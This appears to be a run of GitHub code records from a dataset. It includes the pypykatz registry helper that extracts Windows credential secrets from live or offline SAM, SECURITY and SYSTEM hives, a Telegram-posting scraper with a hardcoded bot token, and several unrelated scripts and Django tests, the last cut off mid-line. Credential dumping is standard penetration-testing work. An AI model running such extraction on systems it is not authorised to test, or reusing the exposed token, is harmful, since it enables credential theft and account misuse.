RegistryCMDHelper:\n\tdef __init__(self):\n\t\tself.live_keywords = ['registry']\n\t\tself.keywords = ['registry']\n\t\t\n\tdef add_args(self, parser, live_parser):\n\t\tlive_group = live_parser.add_parser('registry', help='Get all secrets from registry')\n\t\tlive_group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')\n\t\tlive_group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')\n\t\t\n\t\tgroup = parser.add_parser('registry', help='Get 
secrets from registry files')\n\t\tgroup.add_argument('system', help='path to the SYSTEM registry hive')\n\t\tgroup.add_argument('--sam', help='path to the SAM registry hive')\n\t\tgroup.add_argument('--security', help='path to the SECURITY registry hive')\n\t\tgroup.add_argument('--software', help='path to the SOFTWARE registry hive')\n\t\tgroup.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')\n\t\tgroup.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')\n\t\t\n\tdef execute(self, args):\n\t\tif len(self.keywords) > 0 and args.command in self.keywords:\n\t\t\tself.run(args)\n\t\t\n\t\tif len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords:\n\t\t\tself.run_live(args)\n\t\t\t\n\tdef process_results(self, results, args):\n\t\tif args.outfile:\n\t\t\tresults.to_file(args.outfile, args.json)\n\t\telse:\n\t\t\tif args.json:\n\t\t\t\tprint(json.dumps(results.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))\n\t\t\telse:\n\t\t\t\tprint(str(results))\n\t\t\t\t\n\tdef run_live(self, args):\n\t\tfrom pypykatz.registry.live_parser import LiveRegistry\n\t\tlr = None\n\t\ttry:\n\t\t\tlr = LiveRegistry.go_live()\n\t\texcept Exception as e:\n\t\t\ttraceback.print_exc()\n\t\t\tlogger.debug('Failed to obtain registry secrets via direct registry reading method. Reason: %s' % str(e))\n\t\t\ttry:\n\t\t\t\tfrom pypykatz.registry.offline_parser import OffineRegistry\n\t\t\t\tlr = OffineRegistry.from_live_system()\n\t\t\texcept Exception as e:\n\t\t\t\tlogger.debug('Failed to obtain registry secrets via filedump method')\n\t\t\n\t\tif lr is not None:\n\t\t\tself.process_results(lr, args)\n\t\telse:\n\t\t\tprint('Registry parsing failed!')\n\t\t\t\n\tdef run(self, args):\n\t\tfrom pypykatz.registry.offline_parser import OffineRegistry\n\t\tpo = OffineRegistry.from_files(args.system, args.sam, args.security, args.software)\n\t\t\n\t\tself.process_results(po, args)\n\t\t","repo_name":"skelsec/pypykatz","sub_path":"pypykatz/registry/cmdhelper.py","file_name":"cmdhelper.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"53"} +{"seq_id":"43263429985","text":"import bs4\nfrom bs4 import BeautifulSoup as soup\nfrom urllib.request import Request, urlopen\nimport time\nimport ssl\nimport requests\n\nTOKEN = \"6280442518:AAGO2RrGxgetLZGeB_mVOOzHN4keoc_bvQM\"\nchat_id = \"-1001820093494\"\n\nurl = \"https://www.hastor.com.sg/course/res/real-estate-salesperson-res-course/\"\nssl._create_default_https_context = ssl._create_unverified_context\nreq = Request(url,headers={'User-Agent': 'Mozilla/5.0'})\npage_html = urlopen(req).read()\nurlopen(req).close()\n\npage_soup = soup(page_html, \"html.parser\")\nselect = page_soup.find(\"select\", {\"id\": \"intake\"})\n\nmessage = url\n\nfor option in select.find_all('option'):\n print(option[\"value\"])\n message += str(option[\"value\"]) + \"\\n\\n\"\n print(message)\n\nurl = f\"https://api.telegram.org/bot{TOKEN}/sendMessage?chat_id={chat_id}&text={message}\"\nprint(requests.get(url).json()) # this sends the message","repo_name":"wttg72/RESCheckerBot","sub_path":"rescheck.py","file_name":"rescheck.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30138911959","text":"\"\"\"\n Simple API endpoint for returning 
sets\n\"\"\"\nfrom flask import (Blueprint, render_template, current_app, request,\n flash, url_for, redirect, session, abort, jsonify, make_response)\nfrom mtgsdk import Set\n\nsets = Blueprint('sets', __name__, url_prefix='/api/v1/sets')\n\n@sets.route('/', methods=['GET'])\ndef get_sets():\n sets = Set.all()\n set_list = list(map(lambda set: {'name': set.name, 'code': set.code, 'release_date': set.release_date}, sets))\n result_json = sorted(set_list, key=lambda set: set['release_date'], reverse=True)\n return jsonify({'sets': result_json}), 201\n","repo_name":"thomascmurphy/draft_academy_api","sub_path":"app/api/sets.py","file_name":"sets.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7854037364","text":"import csv\nimport collections\n\n'''\nScript is used to check for duplicates in companylist_full.csv\n'''\n\nwith open ('companylist_full.csv', newline='') as csvfile:\n\tsymbol_list = []\n\tspamreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n\tfor row in spamreader:\n\t\tsymbol = row[0]\n\t\tsymbol_list.append(symbol)\n\tprint ([item for item, count in collections.Counter(symbol_list).items() if count > 1])","repo_name":"Jordan396/JEN-stocktracker-bot","sub_path":"Datasets/duplicate_check.py","file_name":"duplicate_check.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"12941268517","text":"from django import forms\r\n\r\nclass ContactForm(forms.Form):\r\n\r\n message = forms.CharField(\r\n #max_length=2000,\r\n widget=forms.Textarea()\r\n )\r\n \r\n\r\n def clean(self):\r\n cleaned_data = super(ContactForm, self).clean()\r\n message = cleaned_data.get('message')","repo_name":"rujeetjahagirdar/FNDWebAPP","sub_path":"proj/hello/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19098237322","text":"class Solution:\n def leftRigthDifference(self, nums: List[int]) -> List[int]:\n total=sum(nums)\n fixed_total=sum(nums)\n for i,v in enumerate(nums):\n left_sum=fixed_total-total\n right_sum=total-v\n total-=v\n nums[i]=abs(left_sum-right_sum)\n return nums\n \n ","repo_name":"kalebwondimu33/LeetcodeSolutions","sub_path":"2574-left-and-right-sum-differences/2574-left-and-right-sum-differences.py","file_name":"2574-left-and-right-sum-differences.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44701996260","text":"import scrapy\nimport pandas as pd\nimport os\nimport shutil\nimport sys\nsys.path.append('./')\nfrom scraping_text.items import ScrapingTextItem\n\nos.remove(r\"C:\\Users\\kannu\\OneDrive\\Desktop\\DataScience\\Projects\\Blackcoffer\\20211030 Test Assignment\\vscode\\scraping_text\\scraping_text\\Extracted_data.csv\")\ndf=pd.read_excel(r\"C:\\Users\\kannu\\OneDrive\\Desktop\\DataScience\\Projects\\Blackcoffer\\20211030 Test Assignment\\input.xlsx\")\n\n\nclass scraper(scrapy.Spider):\n name='quotes'\n for url in df['URL'].values:\n start_urls=df['URL'].to_list()\n\n def parse(self,response):\n items=ScrapingTextItem()\n title=\" \".join(response.css('.entry-title::text').extract())\n text=\" \".join(response.css('p::text').extract())\n items['title']=title\n items['text']=text\n\n 
url_no=df[df['URL']==response._get_url()][\"URL_ID\"].values[0]\n items['url_id']=url_no\n \n yield items","repo_name":"yogendrajoshiML/Data-Extraction-from-different-URLs-and-NLP","sub_path":"vscode/scraping_text/scraping_text/spiders/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25457133698","text":"def selection_sort(arr):\n # Loop through entire arr\n for i in range(len(arr)):\n curr_min_idx = i # The first element is assumed to be the least at first\n \n # Loop through the other numbers in the arr\n for j in range(i+1, len(arr)):\n # If a different number in the array is smaller, store its index\n if arr[j] < arr[curr_min_idx]:\n curr_min_idx = j\n \n # If a new minimum is found, swap it into the corresponding position\n if curr_min_idx != i:\n arr[i], arr[curr_min_idx] = arr[curr_min_idx], arr[i]\n\n return arr","repo_name":"jnguyen1563/interview-practice","sub_path":"Algorithms/Sorting/algorithms/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44555122255","text":"def solve(linenr, cur_accval, accvals, lines, can_change_ins):\n if linenr == len(lines):\n print(\"Program terminated with accval\")\n print(cur_accval)\n return True\n if linenr in accvals:\n return False\n accvals[linenr] = cur_accval\n\n line = lines[linenr]\n\n op = line[:3]\n if op == \"acc\":\n return solve(linenr+1, cur_accval+int(line[4:]), accvals, lines, can_change_ins)\n\n else: # Op == \"acc\"\n inti = int(line[4:])\n if not can_change_ins:\n if op == \"nop\":\n return solve(linenr+1, cur_accval, accvals, lines, can_change_ins)\n return solve(linenr+inti, cur_accval, accvals, lines, can_change_ins)\n else:\n if op == \"nop\":\n if solve(linenr+1, cur_accval, accvals, lines, True):\n return True\n else:\n if solve(linenr+inti, cur_accval, accvals, lines, False):\n return False\n if op == \"jmp\":\n if solve(linenr+inti, cur_accval, accvals, lines, True):\n return True\n else:\n return solve(linenr+1, cur_accval, accvals, lines, False)\n\n\ndef main():\n f=open(\"input\", \"r\")\n lines=[line.strip() for line in f.readlines()]\n\n accvals=dict()\n linenr=0\n acc=0\n solve(0, 0, accvals, lines, True)\n f.close()\n\ndef main_2():\n f=open(\"input\", \"r\")\n lines=[line.strip() for line in f.readlines()]\n\n accvals=dict()\n linenr=0\n acc=0\n while True:\n if linenr in accvals:\n print(\"duplicate\")\n print(linenr)\n print(\"accval was\")\n print(acc)\n return\n accvals[linenr] = acc\n\n line = lines[linenr]\n op = line[:3]\n if op == \"jmp\":\n inti = int(line[4:])\n linenr += inti\n continue\n if op == \"acc\":\n inti = int(line[4:])\n acc += inti\n linenr+=1\n\nmain_2()\nmain()","repo_name":"simonvbrae/advent-of-code-2020","sub_path":"day8/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13496600146","text":"# Default unittest test cases\nfrom django.test import TestCase\n\n# Model classes\nfrom main.models import *\n#UserSettings, Feed, QueueFeed, Post, RSS, Atom, Topic\n\n# Built in users\nfrom django.contrib.auth.models import User, UserManager\n\n## Transaction Management\nfrom django.db import transaction\n\n# Exception\nfrom main.models import FeedURLInvalid, FeedExistsInTopic\nfrom 
django.db import IntegrityError\nfrom django.core.exceptions import ValidationError\n\n# Python built-ins required for tests\nimport time\nimport datetime\nimport timedelta\nimport pytz\nimport traceback\nimport feedparser\nfrom django.utils import timezone\n\n#UserSettings tests\n# class UserSettingsTestCase(TestCase):\n# def setUp(self):\n# self.user = User.objects.create_user('Lucia', 'lucialu94@uchicago.edu', 'login')\n# self.user.save()\n#\n# def tearDown(self):\n# self.user.delete()\n#\n# def settings_exist(self):\n# \"\"\"Users are created with settings\"\"\"\n# self.assertEqual(self.user.settings.exists(), True)\n#\n# def test_readtime_default(self):\n# \"\"\"Default readtime is 300\"\"\"\n# self.assertEqual(self.user.settings.readtime, 300)\n#\n# def change_readtime_exists(self):\n# \"\"\"Changing the readtime should work\"\"\"\n# self.user.settings.readTime = 400\n# self.assertEqual(self.user.settings.readtime, 400)\n\n#Topic tests\n# class TopicTestCase(TestCase):\n# @classmethod\n# def setUpClass(cls):\n# # User\n# cls.u1 = User.objects.create_user('Devon', 'BAMF@uchicago.edu', 'login')\n# cls.u1.save()\n#\n# # Feed 1\n# cls.f1 = Feed.createByURL(\"http://home.uchicago.edu/~jharriman/example-rss.xml\")\n# cls.f1.save()\n#\n# # Feed 2\n# cls.f2 = Feed.createByURL(\"http://xkcd.com/rss.xml\")\n# cls.f2.save()\n#\n# @classmethod\n# def tearDownClass(cls):\n# cls.f1.delete()\n# cls.f2.delete()\n# cls.u1.delete()\n#\n# def setUp(self):\n# # Create topic t1\n# self.u1.topics.create(name=\"t1\")\n# self.t1 = self.u1.topics.get(name=\"t1\")\n# self.t1.save()\n#\n# # Create topic t2\n# self.u1.topics.create(name=\"t2\")\n# self.t2 = self.u1.topics.get(name=\"t2\")\n# self.t2.save()\n#\n# def tearDown(self):\n# self.t1.delete()\n# self.t2.delete()\n#\n# def test_minimal_topic(self):\n# \"\"\"Tests minimal data needed for Topic\"\"\"\n# def wrap():\n# exceptionRaised = False\n# try:\n# t = Topic(name=\"name\")\n# except Exception:\n# exceptionRaised = True\n# return exceptionRaised\n# self.assertEqual(wrap(), False)\n#\n# def test_edit_topic_name(self):\n# \"\"\"editTopicName renames the topic\"\"\"\n# self.t1.editTopicName(\"space\")\n# self.assertEqual(self.t1.name, \"space\")\n#\n# def test_repeat_topic_name(self):\n# \"\"\"editTopicName throws an error if name already exists\"\"\"\n# def repeat_topic():\n# with transaction.atomic():\n# self.t1.editTopicName(\"t2\")\n# self.assertRaises(IntegrityError, repeat_topic)\n#\n# def test_add_feed(self):\n# \"\"\" adds a Feed to a Topic \"\"\"\n# self.t1.feeds.add(self.f1)\n# self.assertEqual(self.t1.feeds.all()[0], self.f1)\n#\n# # adding Feed to topic it's already in should silently fail\n# self.t1.feeds.add(self.f1)\n# self.assertEqual(self.t1.feeds.all()[0], self.f1)\n# self.assertEqual(len(self.t1.feeds.all()), 1)\n#\n# def test_other_topic_has_feed(self):\n# \"\"\" Cannot add Feed to two topics \"\"\"\n# self.t1.feeds.add(self.f1)\n# def other_topic():\n# self.t2.feeds.add(self.f1)\n# self.assertRaises(ValidationError, other_topic)\n#\n# def test_delete_feed(self):\n# \"\"\" deleteFeed deletes a Feed from a Topic \"\"\"\n# self.t1.feeds.add(self.f1)\n# self.t2.feeds.add(self.f2)\n#\n# #feed not in topic, should fail silently\n# self.t2.deleteFeed(self.f1)\n# self.assertEqual(len(self.t2.feeds.all()), 1)\n# self.assertEqual(self.t2.feeds.all()[0], self.f2)\n#\n# #feed is in topic\n# b1 = self.t1.deleteFeed(self.f1)\n# self.assertEqual(self.t1.feeds.all().exists(), False) #QuerySet of feeds is empty\n\n\nclass FeedTestCase(TestCase):\n 
@classmethod\n def setUpClass(cls):\n cls.rssFeed = Feed.createByURL(\"main/tests/examples/rss20.xml\")\n cls.rssFeed.save()\n cls.atomFeed = Feed.createByURL(\"main/tests/examples/atom10.xml\")\n cls.rssFeed.save()\n cls.badUrl = \"http://example.com\"\n\n @classmethod\n def tearDownClass(cls):\n cls.rssFeed.delete()\n cls.atomFeed.delete()\n\n # def test_create_by_url_atom(self):\n # \"\"\"Constructor Feed.createByURL accurately creates a Feed object\"\"\"\n # feed = self.atomFeed\n #\n # # Check Feed fields\n # self.assertEqual(feed.URL, u\"main/tests/examples/atom10.xml\")\n # self.assertEqual(feed.docURL, u\"\") # Feedparser seems to be failing on this one\n # self.assertEqual(feed.language, u\"\")\n # self.assertEqual(feed.ttl, None)\n # self.assertEqual(feed.title, u\"Sample Feed\")\n # self.assertEqual(feed.subtitle, u\"For documentation <em>only</em>\")\n # self.assertEqual(feed.rights, u\"<p>Copyright 2005, Mark Pilgrim</p>\")\n # self.assertEqual(feed.logo, u\"\")\n # # Dates Equal?\n # # pubTime = \"2002-09-07T00:00:00Z\"\n # # self.assertEqual(feed.pubDate, pubTime)\n # # self.assertEqual(feed.updated, pubTime)\n #\n # # Check each of the Posts\n # posts = feed.posts.all()\n # post = posts[0]\n # self.assertEqual(post.author, u\"Mark Pilgrim (mark@example.org)\")\n # self.assertEqual(post.category, [])\n # self.assertEqual(post.rights, u\"\")\n # self.assertEqual(post.title, u\"First entry title\")\n # self.assertEqual(post.subtitle, \"\")\n # self.assertEqual(post.content, u\"Watch out for nasty tricks\")\n # self.assertEqual(post.generator, u\"\")\n # self.assertEqual(post.guid, u\"tag:feedparser.org,2005-11-09:/docs/examples/atom10.xml:3\")\n # self.assertEqual(post.url, u\"\")\n # self.assertEqual(post.contributor, u\"\")\n # self.assertEqual(post.updated, datetime.datetime(2005, 11, 9, 11, 56, 34, tzinfo=pytz.UTC))\n # self.assertEqual(post.pubDate, datetime.datetime(2005, 11, 9, 0, 23, 47, tzinfo=pytz.UTC))\n\n # def test_create_by_url_rss(self):\n # \"\"\"Constructor Feed.createByURL accurately creates a Feed object\"\"\"\n # feed = self.rssFeed\n #\n # # Check Feed fields\n # self.assertEqual(feed.URL, u\"main/tests/examples/rss20.xml\")\n # self.assertEqual(feed.docURL, u\"http://example.org/\")\n # self.assertEqual(feed.language, u\"en\")\n # self.assertEqual(feed.ttl, 60)\n # self.assertEqual(feed.title, u\"Sample Feed\")\n # self.assertEqual(feed.subtitle, u\"For documentation only\")\n # self.assertEqual(feed.rights, u\"Copyright 2004, Mark Pilgrim\")\n # self.assertEqual(feed.logo, u\"http://example.org/banner.png\")\n # # Dates Equal?\n # pubTime = \"2002-09-07T00:00:00Z\"\n # self.assertEqual(feed.pubDate, pubTime)\n # # self.assertEqual(feed.updated, pubTime)\n #\n # # Check each of the Posts\n # post = feed.posts.all()[0]\n #\n # # Make sure all the fields are equal\n # self.assertEqual(post.author, u\"mark@example.org\")\n # self.assertEqual(post.category, [u\"Miscellaneous\"])\n # self.assertEqual(post.rights, u\"\")\n # self.assertEqual(post.title, u\"First item title\")\n # self.assertEqual(post.subtitle, \"\")\n # self.assertEqual(post.content, u\"Watch out for nasty tricks\")\n # self.assertEqual(post.generator, u\"\")\n # self.assertEqual(post.guid, u\"http://example.org/guid/1\")\n # self.assertEqual(post.url, u\"http://example.org/item/1\")\n # self.assertEqual(post.contributor, u\"\")\n # self.assertEqual(post.updated, datetime.datetime(2002, 9, 5, 0, 0, tzinfo=pytz.UTC))\n # self.assertEqual(post.pubDate, datetime.datetime(2002, 9, 5, 0, 0, 
tzinfo=pytz.UTC))\n #\n # # # RSS Specific fields\n # # self.assertEqual(post.enclosure, [\"http://example.org/audio/demo.mp3\"])\n # # self.assertEqual(post.comments, \"http://example.org/comments/1\")\n # #\n # # # Make sure it doesn't contain Atom specific fields\n # # def checkAtomNotPresent():\n # # post.summary()\n # # self.assertRaises(KeyError, checkAtomNotPresent)\n\n # def test_url_invalid(self):\n # \"\"\" Test if a bad URL (non-feed) raises an invalid feed exception \"\"\"\n # def badFeedUrlCreation():\n # feed = Feed.createByURL(self.badUrl)\n # self.assertRaises(FeedURLInvalid, badFeedUrlCreation)\n\n # def test_minimal_feed(self):\n # \"\"\" Test that we can create a feed with the minimal amount of data \"\"\"\n # def wrap():\n # exceptionRaised = False\n # try:\n # f = Feed()\n # except Exception:\n # exceptionRaised = True\n # return exceptionRaised\n # self.assertEqual(wrap(), False)\n\n # def test_get_posts(self):\n # \"\"\" Test battery for getPosts \"\"\"\n # feed = self.rssFeed\n # posts = feed.getPosts(0)\n #\n # # 0\n # self.assertEqual(feed.getPosts(0), [])\n #\n # # Greater than total number of cases\n # self.assertEqual(feed.getPosts(3), list(feed.posts.all().order_by('-pubDate')))\n #\n # # Check posts equal\n # self.assertEqual(feed.getPosts(1), feed.posts.all()[0])\n #\n # # Empty feed\n # feed = Feed()\n # self.assertEqual(feed.getPosts(1), [])\n\n\n # def test_get_all(self):\n # \"\"\" Test battery for getAll() \"\"\"\n # feed = self.rssFeed\n #\n # # Test that the default test returns all its posts\n # self.assertEqual(feed.getAll(), list(feed.posts.all()))\n #\n # # Test that it returns an empty list with an empty feed\n # feed = Feed()\n # self.assertEqual(feed.getAll(), [])\n\n def test_get_size(self):\n \"\"\" Test battery for getSize() \"\"\"\n # feed = self.rssFeed\n pass\n\n # # Test the actual feed size return\n # self.assertEqual(feed.getSize(), 1)\n #\n # # Test 0 case\n # feed = Feed()\n # self.assertEqual(feed.getSize(), 0)\n #\n # feed.delete()\n\nclass CreateQueueFeedTestCase(TestCase):\n def setUp(self):\n self.user = User.objects.create_user('Devon', 'BAMF@uchicago.edu', 'bozo8')\n self.topic = Topic.objects.create(name = 'Comics')\n self.topic.save()\n self.f1 = Feed.createByURL(\"http://xkcd.com/rss.xml\")\n self.postNum = 2\n self.interval = '2 days'\n\n def tearDown(self):\n self.f1.delete()\n self.topic.delete()\n\n def test_create_queue(self):\n \"\"\"Creates Queue with correct number of posts, correct posts, correct interval and postNum\"\"\"\n #make feed\n q = QueueFeed.create(self.f1, self.postNum, self.interval, self.topic, self.user)\n\n #test postNum, interval, feed, name\n self.assertEqual(q.postNum, self.postNum)\n self.assertEqual(q.interval, datetime.timedelta(days = 2))\n self.assertEqual(q.feed, self.f1)\n self.assertEqual(q.topic, self.topic)\n self.assertEqual(q.name, \"Queue:\"+self.f1.title)\n\n #test qPosts\n fPosts = self.f1.posts.all().order_by('pubDate')\n self.assertItemsEqual(q.queuedPosts.all(), [fPosts[0], fPosts[1]])\n\n q.delete()\n\n def test_long_postNum(self):\n \"\"\"Should return as many posts as possible if postNum is larger than Feed Postlist length\"\"\"\n #postNum 5 greater than size of Feed postlist\n pNum = len(self.f1.posts.all()) + 5\n\n #make QueueFeed with pNum as postNum\n q = QueueFeed.create(self.f1, pNum, self.interval, self.topic, self.user)\n\n #check accuracy of postNum, interval, feed\n self.assertEqual(q.postNum, pNum)\n self.assertEqual(q.interval, datetime.timedelta(days = 2))\n 
self.assertEqual(q.feed, self.f1)\n self.assertEqual(q.topic, self.topic)\n self.assertEqual(q.name, \"Queue:\"+self.f1.title)\n\n #check that qPosts contains all posts in Feed\n fPosts = self.f1.posts.all().order_by('pubDate')\n self.assertItemsEqual(q.queuedPosts.all(), fPosts)\n\n q.delete()\n\nclass QueueFeedTestCase(TestCase):\n def setUp(self):\n\n # mock timezone\n # from http://nedbatchelder.com/blog/201209/mocking_datetimetoday.html\n field = User._meta.get_field('timezone')\n mock_now = lambda: datetime.datetime(2014, 12, 1, 21, 32, 54, 706329, tzinfo=pytz.UTC)\n with patch.object(field, 'now', new=mock_now):\n\n # Create User\n self.user = User.objects.create_user('Devon', 'BAMF@uchicago.edu', 'bozo8')\n self.user.save()\n\n # Create Topic\n self.t1 = self.user.topics.create(name = \"Comics\")\n self.t1.save()\n\n # Create Feeds\n self.f1 = Feed.createByURL(\"http://broodhollow.chainsawsuit.com/feed/\")\n self.f1.save()\n self.f1Posts = self.f1.posts.all().order_by('pubDate')\n\n self.f2 = Feed.createByURL(\"http://www.last-halloween.com/posts.rss\")\n self.f2.save()\n self.f2Posts = self.f2.posts.all().order_by('pubDate')\n\n # Create QueueFeeds\n self.q1PostNum = 3\n self.q1Interval = '1 hour'\n self.q1 = QueueFeed.create(self.f1, self.q1PostNum, self.q1Interval, self.t1, self.user)\n\n self.q2PostNum = 2\n self.q2Interval = '2 hours'\n self.q2 = QueueFeed.create(self.f2, self.q2PostNum, self.q2Interval, self.t1, self.user)\n\n # To test, let's set lastUpdated to an hour ago\n self.q1.lastUpdate = timezone.now() - datetime.timedelta(hours=1, minutes=1)\n\n def tearDown(self):\n # Since QueueFeed owns the ForeignKey for User, deleting the User deletes its QueueFeeds\n self.user.delete()\n\n self.f1.delete()\n self.f2.delete()\n self.t1.delete()\n\n def test_update(self):\n \"\"\"update should update the qPosts and lastUpdate accurately\"\"\"\n self.assertItemsEqual(self.q1.queuedPosts.all(), self.f1Posts[:3])\n #import pdb; pdb.set_trace()\n self.q1.update()\n self.assertItemsEqual(self.q1.queuedPosts.all(), self.f1Posts[:6])\n self.assertEqual(self.q1.lastUpdate, timezone.now())\n\n def test_less_than_interval_update(self):\n \"\"\"update should not change qPosts or lastUpdate if the Interval hasn't passed\"\"\"\n prevUpdate = self.q1.lastUpdate\n self.assertItemsEqual(self.q2.queuedPosts.all(), self.f2Posts[:2])\n self.q1.update()\n self.assertItemsEqual(self.q2.queuedPosts.all(), self.f2Posts[:2])\n self.assertEqual(self.q1.lastUpdate, prevUpdate)\n\nclass StaticQueueFeedTestCase(TestCase):\n\n def setUp(self):\n field = User._meta.get_field('timezone')\n mock_now = lambda: datetime.datetime(2014, 12, 1, 21, 32, 54, 706329, tzinfo=pytz.UTC)\n with patch.object(field, 'now', new=mock_now):\n\n #create User\n self.user = User.objects.create_user('Devon', 'BAMF@uchicago.edu', 'bozo8')\n self.user.save()\n\n #add QueueFeed to User's Topic\n self.t1 = self.user.topics.create(name = \"Horror\")\n self.t1.save()\n\n #create Feed\n self.f1 = Feed.createByURL(\"http://broodhollow.chainsawsuit.com/feed/\")\n self.f1.save()\n self.f1Posts = self.f1.posts.all().order_by('pubDate')\n\n #create QueueFeed\n self.q1PostNum = 3\n self.q1Interval = '1 hour'\n self.q1 = QueueFeed.create(self.f1, self.q1PostNum, self.q1Interval, self.t1, self.user)\n\n #in the interest of testing, set lastUpdated to an hour ago\n self.q1.lastUpdate = timezone.now() - datetime.timedelta(hours = 1)\n\n #A QueueFeed is always created with static = False; only after creation can a user toggle the static attribute\n 
self.q1.static = True\n\n #init a list of posts that have been read for the User\n self.postRead = PostsRead(user = self.user, feed = self.q1.feed)\n self.postRead.save()\n\n def tearDown(self):\n # since QueueFeed owns the ForeignKey for User, deleting the User deletes its QueueFeeds\n self.user.delete()\n self.f1.delete()\n self.t1.delete()\n self.postRead.delete()\n\n def test_empty_update(self):\n \"\"\"if none of the q1PostNum posts have been read and the time interval has passed, qPosts is not refilled\"\"\"\n prevUpdate = self.q1.lastUpdate\n self.assertItemsEqual(self.q1.queuedPosts.all(), self.f1Posts[:self.q1PostNum])\n self.q1.update()\n # print self.q1.queuedPosts.all()\n # print self.f1Posts[:self.q1PostNum]\n self.assertItemsEqual(self.q1.queuedPosts.all(), self.f1Posts[:self.q1PostNum])\n #self.assertEqual(self.q1.lastUpdate, prevUpdate)\n\n def test_full_update(self):\n \"\"\" If all available Posts have been read and the time interval has passed, queuedPosts is refilled \"\"\"\n self.assertItemsEqual(self.q1.queuedPosts.all(), self.f1Posts[:self.q1PostNum])\n #tell postRead that every Post in qPost has been read\n for post in self.q1.queuedPosts.all():\n self.postRead.posts.add(post)\n # print \"postRead.posts.all()\"\n # print self.postRead.posts.all()\n self.q1.update()\n self.assertItemsEqual(self.q1.queuedPosts.all(), self.f1Posts[:(2*self.q1PostNum)])\n #self.assertEqual(self.q1.lastUpdate, timezone.now())\n\n def test_semi_update(self):\n \"\"\" If some of the Posts have been read, queuedPosts is refilled so there are PostNum unread Posts \"\"\"\n self.assertItemsEqual(self.q1.queuedPosts.all(), self.f1Posts[:(self.q1PostNum)])\n\n #There are three items in qPosts upon init of QueueFeed; user reads one item in qPosts\n self.postRead.posts.add(self.q1.queuedPosts.all()[1])\n\n self.q1.update()\n #qPosts grows by 1 post instead of 3; the number of unread qPosts is maintained at postNum (3)\n # print self.q1.queuedPosts.all()\n # print self.f1Posts[:self.q1PostNum+1]\n self.assertItemsEqual(self.q1.queuedPosts.all(), self.f1Posts[:self.q1PostNum+1])\n #self.assertEqual(self.q1.lastUpdate, timezone.now())\n\nclass PostTestCase(TestCase):\n def setUp(self):\n self.feed = Feed()\n self.feed.save()\n # Dont' think we need this if we are making the Post a virtual field\n # def test_create_post(self):\n # \"\"\" Test post constructor createByEntry \"\"\"\n # entry_dict = {\n # \"author\" : \"Test\",\n # \"tags\" : [{\"term\" : \"testCat\"}],\n # \"rights\" : \"BARE ARMS\",\n # \"title\" : \"Title\",\n # \"subtitle\" : \"Subtitle\",\n # \"summary\" : \"
    TEST
    \",\n # \"generator\" : \"I don't know what this is\",\n # \"id\" : \"www.example.com/1892\",\n # \"link\" : \"www.example.com/1892\",\n # \"contributor\" : \"Joe Smith\",\n # \"published_parsed\" : time.struct_time((2014, 11, 2, 16, 13, 2, 6, 306, 0)),\n # \"updated_parsed\" : time.struct_time((2014, 11, 2, 16, 13, 2, 6, 306, 0))\n # }\n #\n # # Create post\n # post = Post.createByEntry(entry_dict, \"www.example.com/test\", self.feed)\n #\n # # Make sure all the fields are equal\n # self.assertEqual(post.author, \"Test\")\n # self.assertEqual(post.category, [\"testCat\"])\n # self.assertEqual(post.rights, \"BARE ARMS\")\n # self.assertEqual(post.title, \"Title\")\n # self.assertEqual(post.subtitle, \"Subtitle\")\n # self.assertEqual(post.content, \"
    TEST
    \")\n # self.assertEqual(post.generator, \"I don't know what this is\")\n # self.assertEqual(post.guid, \"www.example.com/1892\")\n # self.assertEqual(post.url, \"www.example.com/1892\")\n # self.assertEqual(post.contributor, \"Joe Smith\")\n # self.assertEqual(post.updated, datetime.datetime(2014, 11, 2, 14, 00, 22, tzinfo=pytz.UTC))\n # self.assertEqual(post.pubDate, datetime.datetime(2014, 11, 2, 14, 00, 22, tzinfo=pytz.UTC))\n\n def test_post_no_feed(self):\n \"\"\" Test that we cannot create a post with the feed field = null\"\"\"\n def badPostConstruction():\n p = Post()\n self.assertRaises(IntegrityError, badPostConstruction())\n\n def test_minimal_post(self):\n \"\"\" Test that we can create a post with the minimal amount of data \"\"\"\n f = Feed()\n def wrap():\n exceptionRaised = False\n try:\n p = Post({\"feed\" : f})\n except Exception:\n exceptionRaised = True\n return exceptionRaised\n self.assertEquals(wrap(), False)\n\nclass RSSTestCase(TestCase):\n @classmethod\n def setUpClass(cls):\n # Create a feed to put the post in, since the post must have a feed.\n cls.feed = Feed()\n cls.feed.save()\n\n # Grab an entry and parse it\n cls.entry = feedparser.parse(\"main/tests/examples/rss20.xml\")[\"entries\"][0]\n\n @classmethod\n def tearDownClass(cls):\n cls.feed.delete()\n\n def test_create_rss(self):\n \"\"\" Test RSS constructor createByEntry \"\"\"\n # Create post\n post = RSS.createByEntry(self.entry, \"http://www.example.org/atom10.xml\", self.feed)\n post.save()\n post = Post.objects.get(id=post.id)\n\n # Make sure all the fields are equal\n self.assertEqual(post.author, 